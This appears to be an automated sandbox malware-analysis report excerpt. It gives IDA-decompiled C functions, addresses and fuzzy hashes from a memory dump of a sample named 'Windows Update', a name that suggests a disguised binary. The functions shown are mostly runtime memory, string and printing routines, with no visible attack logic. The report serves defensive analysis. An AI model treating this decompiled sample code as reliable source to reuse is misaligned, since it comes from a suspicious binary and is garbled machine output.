                                                                                                                    0x000795de
                                                                                                                    0x00079675
                                                                                                                    0x00079675
                                                                                                                    0x00079675
                                                                                                                    0x00000000
                                                                                                                    0x0007959a
                                                                                                                    0x00079594
                                                                                                                    0x00079566
                                                                                                                    0x00079549
                                                                                                                    0x0007954c
                                                                                                                    0x0007954e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0007954e
                                                                                                                    0x00079526
                                                                                                                    0x0007952b
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3877424927-0
                                                                                                                    • Opcode ID: 58f39add579991dad9ef1299213d9b84eb0245becf2f57f16a0bdcd36f41b157
                                                                                                                    • Instruction ID: 3dc2bf31512e1ba099e1a507d1472dda81ce160777ccb9278e128c6e7f72b503
                                                                                                                    • Opcode Fuzzy Hash: 58f39add579991dad9ef1299213d9b84eb0245becf2f57f16a0bdcd36f41b157
                                                                                                                    • Instruction Fuzzy Hash: 5251C270E00B059BDB258FB9C885AAE77E5AF40324F24C72DF82D962D1D779DE508B48
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00020637 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 51%
                                                                                                                    			E00020637(void* __ebx, void* __edx, void* __edi, intOrPtr* _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v1032;
				char _v1036;
				char _v1040;
				void* __esi;
				intOrPtr* _t23;
				void* _t25;
				intOrPtr _t28;
				intOrPtr _t36;
				char* _t42;
				intOrPtr _t46;
				void* _t47;
				void* _t48;
				intOrPtr _t49;
				void* _t66;
				void* _t68;
				void* _t70;
				void* _t71;
				intOrPtr* _t72;
				signed int _t73;

				_t64 = __edx;
				_t45 = __ebx;
				_v8 =  *0x481f80 ^ _t73;
				_t23 = _a4;
				_t49 =  *_t23;
				_t72 = _a8;
				_v1036 = 0;
				_v1040 = 0;
				if(_t49 != 0) {
					_push(__edi);
					_push(0x400);
					_push( &_v1032);
					if(_t49 == 0x7e) {
						_push(_t23 + 1);
						_t25 = E0001B777();
						if(_t25 == 0) {
							goto L11;
						} else {
							_t17 = _t25 + 1; // 0x1
							_t67 = _t17;
							_t28 = E00077BCE(__ebx, _t17, _t17);
							 *_t72 = _t28;
							if(_t28 != 0) {
								E00077AF9(_t28, _t67,  &_v1032);
								_pop(_t68);
								return E000772F2(1, __ebx, _v8 ^ _t73, _t64, _t68, _t72);
							} else {
								goto L11;
							}
						}
					} else {
						_push(_t23);
						if(E0001B777() == 0 || E00021067( &_v1032, _t32,  &_v1040,  &_v1036) == 0) {
							L11:
							_pop(_t66);
							return E000772F2(0, _t45, _v8 ^ _t73, _t64, _t66, _t72);
						} else {
							_t69 = _v1040;
							if(_v1040 == 0) {
								goto L11;
							} else {
								_push(__ebx);
								_t46 = _v1036;
								_t13 = _t46 + 1; // 0x1
								_t36 = E00077BCE(_t46, _t69, _t13);
								 *_t72 = _t36;
								if(_t36 != 0) {
									E00077337(_t36, _t69, _t46);
									 *((char*)(_t46 +  *_t72)) = 0;
									_pop(_t47);
									_pop(_t70);
									return E000772F2(1, _t47, _v8 ^ _t73, _t64, _t70, _t72);
								} else {
									_pop(_t48);
									_pop(_t71);
									return E000772F2(_t36, _t48, _v8 ^ _t73, _t64, _t71, _t72);
								}
							}
						}
					}
				} else {
					_t42 = E00077BCE(__ebx, __edi, 1);
					 *_t72 = _t42;
					 *_t42 = 0;
					return E000772F2(1, __ebx, _v8 ^ _t73, __edx, __edi, _t72);
				}
			}























                                                                                                                    0x00020637
                                                                                                                    0x00020637
                                                                                                                    0x00020647
                                                                                                                    0x0002064a
                                                                                                                    0x0002064e
                                                                                                                    0x00020650
                                                                                                                    0x00020653
                                                                                                                    0x0002065d
                                                                                                                    0x00020669
                                                                                                                    0x0002068e
                                                                                                                    0x00020692
                                                                                                                    0x0002069d
                                                                                                                    0x0002069e
                                                                                                                    0x00020733
                                                                                                                    0x00020734
                                                                                                                    0x0002073e
                                                                                                                    0x00000000
                                                                                                                    0x00020740
                                                                                                                    0x00020740
                                                                                                                    0x00020740
                                                                                                                    0x00020744
                                                                                                                    0x0002074c
                                                                                                                    0x00020750
                                                                                                                    0x0002076d
                                                                                                                    0x0002077a
                                                                                                                    0x00020789
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00020750
                                                                                                                    0x000206a4
                                                                                                                    0x000206a4
                                                                                                                    0x000206af
                                                                                                                    0x00020752
                                                                                                                    0x00020752
                                                                                                                    0x00020763
                                                                                                                    0x000206d7
                                                                                                                    0x000206d7
                                                                                                                    0x000206df
                                                                                                                    0x00000000
                                                                                                                    0x000206e1
                                                                                                                    0x000206e1
                                                                                                                    0x000206e2
                                                                                                                    0x000206e8
                                                                                                                    0x000206ec
                                                                                                                    0x000206f4
                                                                                                                    0x000206f8
                                                                                                                    0x0002070e
                                                                                                                    0x00020718
                                                                                                                    0x0002071c
                                                                                                                    0x0002071d
                                                                                                                    0x00020731
                                                                                                                    0x000206fa
                                                                                                                    0x000206fa
                                                                                                                    0x000206fb
                                                                                                                    0x0002070a
                                                                                                                    0x0002070a
                                                                                                                    0x000206f8
                                                                                                                    0x000206df
                                                                                                                    0x000206af
                                                                                                                    0x0002066b
                                                                                                                    0x0002066d
                                                                                                                    0x00020672
                                                                                                                    0x00020677
                                                                                                                    0x0002068d
                                                                                                                    0x0002068d

                                                                                                                    APIs
                                                                                                                    • _malloc.LIBCMT ref: 0002066D
                                                                                                                      • Part of subcall function 00077BCE: __FF_MSGBANNER.LIBCMT ref: 00077BE5
                                                                                                                      • Part of subcall function 00077BCE: __NMSG_WRITE.LIBCMT ref: 00077BEC
                                                                                                                    • _malloc.LIBCMT ref: 000206EC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1579825452-0
                                                                                                                    • Opcode ID: 1d39e5989a297ab83a30d9f49a44099e95956c0efd58856c6507a816c9dd62df
                                                                                                                    • Instruction ID: 2c1deb9b42bd0c38ae277fbd994587a5768f0adb8a67d91f5626aa81295ea6d5
                                                                                                                    • Opcode Fuzzy Hash: 1d39e5989a297ab83a30d9f49a44099e95956c0efd58856c6507a816c9dd62df
                                                                                                                    • Instruction Fuzzy Hash: D2319BB1E041189BDB10DFA8EC41BEEB3ECEF55300F0041A9FE4D97243EA75AA568B55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 000A56AC Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 51%
                                                                                                                    			E000A56AC(void* __ebx, void* __edx, void* __edi, intOrPtr* _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v1032;
				char _v1036;
				char _v1040;
				void* __esi;
				intOrPtr* _t23;
				void* _t25;
				intOrPtr _t28;
				intOrPtr _t36;
				char* _t42;
				intOrPtr _t46;
				void* _t47;
				void* _t48;
				intOrPtr _t49;
				void* _t66;
				void* _t68;
				void* _t70;
				void* _t71;
				intOrPtr* _t72;
				signed int _t73;

				_t64 = __edx;
				_t45 = __ebx;
				_v8 =  *0x482960 ^ _t73;
				_t23 = _a4;
				_t49 =  *_t23;
				_t72 = _a8;
				_v1036 = 0;
				_v1040 = 0;
				if(_t49 != 0) {
					_push(__edi);
					_push(0x400);
					_push( &_v1032);
					if(_t49 == 0x7e) {
						_push(_t23 + 1);
						_t25 = L0009DD7C();
						if(_t25 == 0) {
							goto L11;
						} else {
							_t17 = _t25 + 1; // 0x1
							_t67 = _t17;
							_t28 = L000FCD57(__ebx, _t17, _t17);
							 *_t72 = _t28;
							if(_t28 != 0) {
								E000FC711(_t28, _t67,  &_v1032);
								_pop(_t68);
								return L000FBE87(1, __ebx, _v8 ^ _t73, _t64, _t68, _t72);
							} else {
								goto L11;
							}
						}
					} else {
						_push(_t23);
						if(L0009DD7C() == 0 || E000A5CEC( &_v1032, _t32,  &_v1040,  &_v1036) == 0) {
							L11:
							_pop(_t66);
							return L000FBE87(0, _t45, _v8 ^ _t73, _t64, _t66, _t72);
						} else {
							_t69 = _v1040;
							if(_v1040 == 0) {
								goto L11;
							} else {
								_push(__ebx);
								_t46 = _v1036;
								_t13 = _t46 + 1; // 0x1
								_t36 = L000FCD57(_t46, _t69, _t13);
								 *_t72 = _t36;
								if(_t36 != 0) {
									L000FBECC(_t36, _t69, _t46);
									 *((char*)(_t46 +  *_t72)) = 0;
									_pop(_t47);
									_pop(_t70);
									return L000FBE87(1, _t47, _v8 ^ _t73, _t64, _t70, _t72);
								} else {
									_pop(_t48);
									_pop(_t71);
									return L000FBE87(_t36, _t48, _v8 ^ _t73, _t64, _t71, _t72);
								}
							}
						}
					}
				} else {
					_t42 = L000FCD57(__ebx, __edi, 1);
					 *_t72 = _t42;
					 *_t42 = 0;
					return L000FBE87(1, __ebx, _v8 ^ _t73, __edx, __edi, _t72);
				}
			}























                                                                                                                    0x000a56ac
                                                                                                                    0x000a56ac
                                                                                                                    0x000a56bc
                                                                                                                    0x000a56bf
                                                                                                                    0x000a56c3
                                                                                                                    0x000a56c5
                                                                                                                    0x000a56c8
                                                                                                                    0x000a56d2
                                                                                                                    0x000a56de
                                                                                                                    0x000a5703
                                                                                                                    0x000a5707
                                                                                                                    0x000a5712
                                                                                                                    0x000a5713
                                                                                                                    0x000a57a8
                                                                                                                    0x000a57a9
                                                                                                                    0x000a57b3
                                                                                                                    0x00000000
                                                                                                                    0x000a57b5
                                                                                                                    0x000a57b5
                                                                                                                    0x000a57b5
                                                                                                                    0x000a57b9
                                                                                                                    0x000a57c1
                                                                                                                    0x000a57c5
                                                                                                                    0x000a57e2
                                                                                                                    0x000a57ef
                                                                                                                    0x000a57fe
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a57c5
                                                                                                                    0x000a5719
                                                                                                                    0x000a5719
                                                                                                                    0x000a5724
                                                                                                                    0x000a57c7
                                                                                                                    0x000a57c7
                                                                                                                    0x000a57d8
                                                                                                                    0x000a574c
                                                                                                                    0x000a574c
                                                                                                                    0x000a5754
                                                                                                                    0x00000000
                                                                                                                    0x000a5756
                                                                                                                    0x000a5756
                                                                                                                    0x000a5757
                                                                                                                    0x000a575d
                                                                                                                    0x000a5761
                                                                                                                    0x000a5769
                                                                                                                    0x000a576d
                                                                                                                    0x000a5783
                                                                                                                    0x000a578d
                                                                                                                    0x000a5791
                                                                                                                    0x000a5792
                                                                                                                    0x000a57a6
                                                                                                                    0x000a576f
                                                                                                                    0x000a576f
                                                                                                                    0x000a5770
                                                                                                                    0x000a577f
                                                                                                                    0x000a577f
                                                                                                                    0x000a576d
                                                                                                                    0x000a5754
                                                                                                                    0x000a5724
                                                                                                                    0x000a56e0
                                                                                                                    0x000a56e2
                                                                                                                    0x000a56e7
                                                                                                                    0x000a56ec
                                                                                                                    0x000a5702
                                                                                                                    0x000a5702

                                                                                                                    APIs
                                                                                                                    • _malloc.LIBCMT ref: 000A56E2
                                                                                                                      • Part of subcall function 000FCD57: __FF_MSGBANNER.LIBCMT ref: 000FCD6E
                                                                                                                      • Part of subcall function 000FCD57: __NMSG_WRITE.LIBCMT ref: 000FCD75
                                                                                                                    • _malloc.LIBCMT ref: 000A5761
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1579825452-0
                                                                                                                    • Opcode ID: e92b84fdb3ea4c7bec815727710f77de4d6ceddc4ef0be32e9027ff49b72c9cb
                                                                                                                    • Instruction ID: dd9f0803a13142107a914d9f4461893cb68b76a1d2295e4fbe91a54cfdc43e1b
                                                                                                                    • Opcode Fuzzy Hash: e92b84fdb3ea4c7bec815727710f77de4d6ceddc4ef0be32e9027ff49b72c9cb
                                                                                                                    • Instruction Fuzzy Hash: D231C8F1A0010C9BDB10DBA8EC42BFE73E8EF55304F0401EDEB09A7642EA359A55CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0009E0EC Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 43%
                                                                                                                    			E0009E0EC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				long _v1032;
				char _v1036;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				signed short* _v1052;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t27;
				signed short** _t31;
				wchar_t* _t40;
				void* _t45;
				void* _t51;
				intOrPtr _t52;
				void* _t53;
				signed int _t54;
				void* _t55;
				void* _t57;

				_v8 =  *0x482960 ^ _t54;
				_t52 = _a4;
				_v1048 = _a8;
				_v1044 = _a12;
				_t26 = E000FC711(_a12, _a16, 0x4742f5);
				_push(0);
				_push(_t52);
				L000FBD44();
				_t45 = _t26;
				_t27 = L000FCD57(_t45, _t52, _t45);
				_t53 = _t27;
				_t57 = _t55 + 0x10;
				if(_t53 == 0) {
					L3:
					return L000FBE87(0, _t45, _v8 ^ _t54, _t51, _t52, _t53);
				} else {
					_push(_t53);
					_push(_t45);
					_push(0);
					_push(_t52);
					L000FBD4A();
					if(_t27 != 0) {
						_push( &_v1036);
						_t31 =  &_v1052;
						_push(_t31);
						_push(0x4742f8);
						_push(_t53);
						L000FBD50();
						if(_t31 == 0) {
							goto L2;
						} else {
							swprintf( &_v1032, 0x400, 0x474314,  *_v1052 & 0x0000ffff, _v1052[1] & 0x0000ffff, _v1048);
							_t57 = _t57 + 0x18;
							_push( &_v1036);
							_push( &_v1040);
							_t40 =  &_v1032;
							_push(_t40);
							_push(_t53);
							L000FBD50();
							if(_t40 == 0) {
								goto L2;
							} else {
								E000FC711(_v1044, _a16, _v1040);
								E000FCD1F(_t53);
								return L000FBE87(1, _t45, _v8 ^ _t54, _t51, _t52, _t53);
							}
						}
					} else {
						L2:
						 *0x47412c();
						E000FCD1F(_t53);
						goto L3;
					}
				}
			}
























                                                                                                                    0x0009e0fc
                                                                                                                    0x0009e105
                                                                                                                    0x0009e110
                                                                                                                    0x0009e11a
                                                                                                                    0x0009e120
                                                                                                                    0x0009e128
                                                                                                                    0x0009e12a
                                                                                                                    0x0009e12b
                                                                                                                    0x0009e130
                                                                                                                    0x0009e133
                                                                                                                    0x0009e138
                                                                                                                    0x0009e13a
                                                                                                                    0x0009e13f
                                                                                                                    0x0009e160
                                                                                                                    0x0009e170
                                                                                                                    0x0009e141
                                                                                                                    0x0009e141
                                                                                                                    0x0009e142
                                                                                                                    0x0009e143
                                                                                                                    0x0009e145
                                                                                                                    0x0009e146
                                                                                                                    0x0009e14d
                                                                                                                    0x0009e177
                                                                                                                    0x0009e178
                                                                                                                    0x0009e17e
                                                                                                                    0x0009e17f
                                                                                                                    0x0009e184
                                                                                                                    0x0009e185
                                                                                                                    0x0009e18c
                                                                                                                    0x00000000
                                                                                                                    0x0009e18e
                                                                                                                    0x0009e1b4
                                                                                                                    0x0009e1b9
                                                                                                                    0x0009e1c2
                                                                                                                    0x0009e1c9
                                                                                                                    0x0009e1ca
                                                                                                                    0x0009e1d0
                                                                                                                    0x0009e1d1
                                                                                                                    0x0009e1d2
                                                                                                                    0x0009e1d9
                                                                                                                    0x00000000
                                                                                                                    0x0009e1df
                                                                                                                    0x0009e1ee
                                                                                                                    0x0009e1f4
                                                                                                                    0x0009e211
                                                                                                                    0x0009e211
                                                                                                                    0x0009e1d9
                                                                                                                    0x0009e14f
                                                                                                                    0x0009e14f
                                                                                                                    0x0009e14f
                                                                                                                    0x0009e156
                                                                                                                    0x00000000
                                                                                                                    0x0009e15b
                                                                                                                    0x0009e14d

                                                                                                                    APIs
                                                                                                                    • _malloc.LIBCMT ref: 0009E133
                                                                                                                      • Part of subcall function 000FCD57: __FF_MSGBANNER.LIBCMT ref: 000FCD6E
                                                                                                                      • Part of subcall function 000FCD57: __NMSG_WRITE.LIBCMT ref: 000FCD75
                                                                                                                    • _free.LIBCMT ref: 0009E156
                                                                                                                    • swprintf.LIBCMT ref: 0009E1B4
                                                                                                                    • _free.LIBCMT ref: 0009E1F4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$_mallocswprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 977208848-0
                                                                                                                    • Opcode ID: d6b6ee1db0460668af34d651dc04538c6f312164209d917a8e2ab7af3dd59f59
                                                                                                                    • Instruction ID: 5228163233769441b754cfcdebc64120216e0c5fc326d3afdd61804045d32aa3
                                                                                                                    • Opcode Fuzzy Hash: d6b6ee1db0460668af34d651dc04538c6f312164209d917a8e2ab7af3dd59f59
                                                                                                                    • Instruction Fuzzy Hash: 753186B2A0011C6BDB50EB64CD42FFE77ACAF48300F1400B5FB08E6542EB359E959BA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 000793FA Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E000793FA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t47;
				void* _t48;
				intOrPtr _t54;
				signed int _t60;
				void* _t61;
				intOrPtr _t65;
				void* _t68;

				_push(0x10);
				_push(0x47dac8);
				E0007EC57(__ebx, __edi, __esi);
				if((0 |  *((intOrPtr*)(_t68 + 8)) != 0x00000000) != 0) {
					_t65 =  *((intOrPtr*)(_t68 + 0xc));
					_t65 = _t65 != 0;
					if(_t65 != 0) {
						goto L1;
					} else {
						__eflags =  *(_t65 + 0xc) & 0x00000040;
						if(( *(_t65 + 0xc) & 0x00000040) != 0) {
							L14:
							_t54 = L0007FF27( *((intOrPtr*)(_t68 + 8)));
							 *((intOrPtr*)(_t68 - 0x1c)) = _t54;
							L0007EFE7(_t65);
							 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
							_t41 = L0007EE7D(_t54, __eflags, _t65);
							 *((intOrPtr*)(_t68 - 0x20)) = L0007FDC8( *((intOrPtr*)(_t68 + 8)), 1, _t54, _t65);
							L0007EE4C(_t41, _t65);
							 *(_t68 - 4) = 0xfffffffe;
							E000794F8(_t65);
							__eflags =  *((intOrPtr*)(_t68 - 0x20)) - _t54;
							_t37 = (__eflags == 0) - 1;
							__eflags = (__eflags == 0) - 1;
						} else {
							_t47 = L0007EF23(_t65);
							_t60 = _t47;
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L7:
								_t48 = 0x482cc0;
							} else {
								__eflags = _t60 - 0xfffffffe;
								if(_t60 == 0xfffffffe) {
									goto L7;
								} else {
									_t48 = ((_t47 & 0x0000001f) << 6) +  *((intOrPtr*)(0x487f50 + (_t60 >> 5) * 4));
								}
							}
							__eflags =  *(_t48 + 0x24) & 0x0000007f;
							if(( *(_t48 + 0x24) & 0x0000007f) != 0) {
								goto L1;
							} else {
								__eflags = _t60 - 0xffffffff;
								if(_t60 == 0xffffffff) {
									L12:
									_t61 = 0x482cc0;
								} else {
									__eflags = _t60 - 0xfffffffe;
									if(_t60 == 0xfffffffe) {
										goto L12;
									} else {
										_t61 = ((_t60 & 0x0000001f) << 6) +  *((intOrPtr*)(0x487f50 + (_t60 >> 5) * 4));
									}
								}
								__eflags =  *(_t61 + 0x24) & 0x00000080;
								if(( *(_t61 + 0x24) & 0x00000080) != 0) {
									goto L1;
								} else {
									goto L14;
								}
							}
						}
					}
				} else {
					L1:
					 *((intOrPtr*)(E0007C705())) = 0x16;
					_t37 = E0007C696() | 0xffffffff;
				}
				return E0007EC9C(_t37);
			}











                                                                                                                    0x000793fa
                                                                                                                    0x000793fc
                                                                                                                    0x00079401
                                                                                                                    0x00079410
                                                                                                                    0x0007942c
                                                                                                                    0x00079434
                                                                                                                    0x00079436
                                                                                                                    0x00000000
                                                                                                                    0x00079438
                                                                                                                    0x00079438
                                                                                                                    0x0007943c
                                                                                                                    0x0007949d
                                                                                                                    0x000794a5
                                                                                                                    0x000794a7
                                                                                                                    0x000794ab
                                                                                                                    0x000794b2
                                                                                                                    0x000794b7
                                                                                                                    0x000794ca
                                                                                                                    0x000794cf
                                                                                                                    0x000794d7
                                                                                                                    0x000794de
                                                                                                                    0x000794e5
                                                                                                                    0x000794eb
                                                                                                                    0x000794eb
                                                                                                                    0x0007943e
                                                                                                                    0x0007943f
                                                                                                                    0x00079445
                                                                                                                    0x00079447
                                                                                                                    0x0007944a
                                                                                                                    0x00079465
                                                                                                                    0x00079465
                                                                                                                    0x0007944c
                                                                                                                    0x0007944c
                                                                                                                    0x0007944f
                                                                                                                    0x00000000
                                                                                                                    0x00079451
                                                                                                                    0x0007945c
                                                                                                                    0x0007945c
                                                                                                                    0x0007944f
                                                                                                                    0x0007946a
                                                                                                                    0x0007946e
                                                                                                                    0x00000000
                                                                                                                    0x00079470
                                                                                                                    0x00079470
                                                                                                                    0x00079473
                                                                                                                    0x0007948e
                                                                                                                    0x0007948e
                                                                                                                    0x00079475
                                                                                                                    0x00079475
                                                                                                                    0x00079478
                                                                                                                    0x00000000
                                                                                                                    0x0007947a
                                                                                                                    0x00079485
                                                                                                                    0x00079485
                                                                                                                    0x00079478
                                                                                                                    0x00079493
                                                                                                                    0x00079497
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00079497
                                                                                                                    0x0007946e
                                                                                                                    0x0007943c
                                                                                                                    0x00079412
                                                                                                                    0x00079412
                                                                                                                    0x00079417
                                                                                                                    0x00079422
                                                                                                                    0x00079422
                                                                                                                    0x000794f1

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __ftbuf__getptd_noexit__lock_file__stbuf_strlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 583463211-0
                                                                                                                    • Opcode ID: 09c5d80d8fcb19464d5a52424c282238ab65492efece285c179610394c12f1a9
                                                                                                                    • Instruction ID: 518f1599c800fd3df98b736b23d2bcb5c1781ebbc7e1771c42ef16febafd738d
                                                                                                                    • Opcode Fuzzy Hash: 09c5d80d8fcb19464d5a52424c282238ab65492efece285c179610394c12f1a9
                                                                                                                    • Instruction Fuzzy Hash: 6F210671E142449ADB606A34CD41FAD26A1AF86330F28C768F83C8A1D2DB7C9D43921C
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 000A323C Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 23%
                                                                                                                    			E000A323C() {
				signed int _v8;
				signed short _v24;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t14;
				void* _t17;
				intOrPtr* _t20;
				void* _t24;
				signed int _t25;
				intOrPtr* _t27;
				signed int _t28;

				_v8 =  *0x482960 ^ _t28;
				_t20 =  *0x474044;
				_t7 =  *_t20(0xfffffff5);
				_t8 =  *0x474074(_t7,  &_v32);
				_t25 = _v24 & 0x0000ffff;
				_t32 = _t8;
				if(_t8 == 0) {
					_t25 = 0xf;
				}
				_t9 =  *_t20(0xfffffff5);
				_t27 =  *0x474078;
				 *_t27(_t9, 0xf);
				L000FDF32(_t25, _t27, _t32);
				L000FDF32(_t25, _t27, _t32);
				L000FDF32(_t25, _t27, _t32);
				_t14 =  *_t20(0xfffffff5, 0x474500, 0x4744cc, 0x4744ac, 0x474498, 0x474494, 0x474450);
				 *_t27(_t14, 0xf);
				L000FDF32(_t25, _t27, _t32);
				_t17 =  *_t20(0xfffffff5, 0x474450);
				return L000FBE87( *_t27(_t25 | 0x00000008), _t20, _v8 ^ _t28, _t24, _t25 | 0x00000008, _t27, _t17);
			}




















                                                                                                                    0x000a3249
                                                                                                                    0x000a324d
                                                                                                                    0x000a3257
                                                                                                                    0x000a325e
                                                                                                                    0x000a3264
                                                                                                                    0x000a3268
                                                                                                                    0x000a326a
                                                                                                                    0x000a326c
                                                                                                                    0x000a326c
                                                                                                                    0x000a3273
                                                                                                                    0x000a3275
                                                                                                                    0x000a327e
                                                                                                                    0x000a3285
                                                                                                                    0x000a3299
                                                                                                                    0x000a32a8
                                                                                                                    0x000a32b2
                                                                                                                    0x000a32b7
                                                                                                                    0x000a32be
                                                                                                                    0x000a32c8
                                                                                                                    0x000a32e1

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _wprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738768116-0
                                                                                                                    • Opcode ID: d544947f804929882c05d4acd3def1f6b24267c74fa83daaa730368f6ebb61d7
                                                                                                                    • Instruction ID: 1731af727ddb9cb23024f9fe11debd9c296375a060d1ea9fdb355759cc8e27e3
                                                                                                                    • Opcode Fuzzy Hash: d544947f804929882c05d4acd3def1f6b24267c74fa83daaa730368f6ebb61d7
                                                                                                                    • Instruction Fuzzy Hash: 7D01FE52B8020876C910B7F55C46FFE765C9B90B20F214326B72DA35C2DB6494046675
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0001F2D7 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 23%
                                                                                                                    			E0001F2D7() {
				signed int _v8;
				signed short _v24;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t14;
				void* _t17;
				intOrPtr* _t20;
				void* _t24;
				signed int _t25;
				intOrPtr* _t27;
				signed int _t28;

				_v8 =  *0x481f80 ^ _t28;
				_t20 =  *0x470104;
				_t7 =  *_t20(0xfffffff5);
				_t8 =  *0x47004c(_t7,  &_v32);
				_t25 = _v24 & 0x0000ffff;
				_t32 = _t8;
				if(_t8 == 0) {
					_t25 = 0xf;
				}
				_t9 =  *_t20(0xfffffff5);
				_t27 =  *0x470050;
				 *_t27(_t9, 0xf);
				E00079C53(_t20, _t25, _t27, _t32);
				E00079C53(_t20, _t25, _t27, _t32);
				E00079C53(_t20, _t25, _t27, _t32);
				_t14 =  *_t20(0xfffffff5, 0x4703d0, 0x470398, 0x470378, 0x470360, 0x47035c, 0x470318);
				 *_t27(_t14, 0xf);
				E00079C53(_t20, _t25, _t27, _t32);
				_t17 =  *_t20(0xfffffff5, 0x470318);
				return E000772F2( *_t27(_t25 | 0x00000008), _t20, _v8 ^ _t28, _t24, _t25 | 0x00000008, _t27, _t17);
			}




















                                                                                                                    0x0001f2e4
                                                                                                                    0x0001f2e8
                                                                                                                    0x0001f2f2
                                                                                                                    0x0001f2f9
                                                                                                                    0x0001f2ff
                                                                                                                    0x0001f303
                                                                                                                    0x0001f305
